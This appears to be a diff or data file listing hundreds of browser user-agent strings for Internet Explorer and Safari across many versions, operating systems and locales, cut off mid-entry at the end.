+Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; msn OptimizedIE8;ZHCN) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) +Mozilla/4.0 (compatible; U; MSIE 6.0; Windows NT 5.1) +Mozilla/4.0 (Compatible; Windows NT 5.1; MSIE 6.0) (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) +Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1) +Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) +Mozilla/4.0 (MSIE 6.0; Windows NT 5.0) +Mozilla/4.0 (MSIE 6.0; Windows NT 5.1) +Mozilla/4.0 WebTV/2.6 (compatible; MSIE 4.0) +Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.0) +Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) +Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 5.2) +Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0) +Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) +Mozilla/4.0 (X11; MSIE 6.0; i686; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM) +Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN) +Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1) +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325) +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; SpamBlockerUtility 6.3.91; SpamBlockerUtility 6.2.91; .NET CLR 4.1.89;GB) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; fr-FR) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; c .NET CLR 3.0.04506; .NET CLR 3.5.30707; InfoPath.1; el-GR) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322) +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.1.76908; WOW64; en-US) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.1; SV1; .NET CLR 2.8.52393; WOW64; en-US) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/13.0.782.215) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0) +Mozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648) +Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko +Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) +Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) +Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; el-GR) +Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) +Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) + +# Safari + +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6) AppleWebKit/531.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.4 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-au) AppleWebKit/525.8+ (KHTML, like Gecko) Version/3.1 Safari/525.6 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-gb) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.7 (KHTML, like Gecko) Version/3.1 Safari/525.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/525.9 (KHTML, like Gecko) Version/3.1 Safari/525.9 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; en-us) AppleWebKit/526.1+ (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; fr-fr) AppleWebKit/525.9 (KHTML, like Gecko) Version/3.1 Safari/525.9 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; it-it) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; pt-br) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; en-ca) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; es-es) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; hu-hu) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nb-no) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-gb) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.25 (KHTML, like Gecko) Version/3.2 Safari/525.25 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; it-it) AppleWebKit/525.18 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; ja-jp) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; sv-se) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.7+ (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/530.6+ (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; hr-hr) AppleWebKit/530.1+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; it-it) AppleWebKit/528.8+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ko-kr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; nb-no) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ru-ru) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; zh-tw) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.1 Safari/530.18 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/4.0.1 Safari/530.18 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.3 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fi-fi) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-tw) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; nl-nl) AppleWebKit/532.3+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; de-at) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; nb-no) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ru-ru) AppleWebKit/533.2+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ca-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; el-gr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-au) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/533.4+ (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/534.1+ (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; es-es) AppleWebKit/531.22.7 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; HTC-P715a; en-ca) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ko-kr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ru-ru) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; zh-cn) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; th-th) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; ar) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-ch) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ko-kr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; sv-se) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; da-dk) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/533.4 (KHTML, like Gecko) Version/4.1 Safari/533.4 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de-de) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/521.32.1 (KHTML, like Gecko) Safari/521.32.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.2+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.5+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.9+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/525.1+ (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; es-es) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; fr) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; fr-fr) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; fr-fr) AppleWebKit/525.1+ (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; it-IT) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; it-it) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; it-it) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ko-kr) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; ru-ru) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; sv-se) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; sv-se) 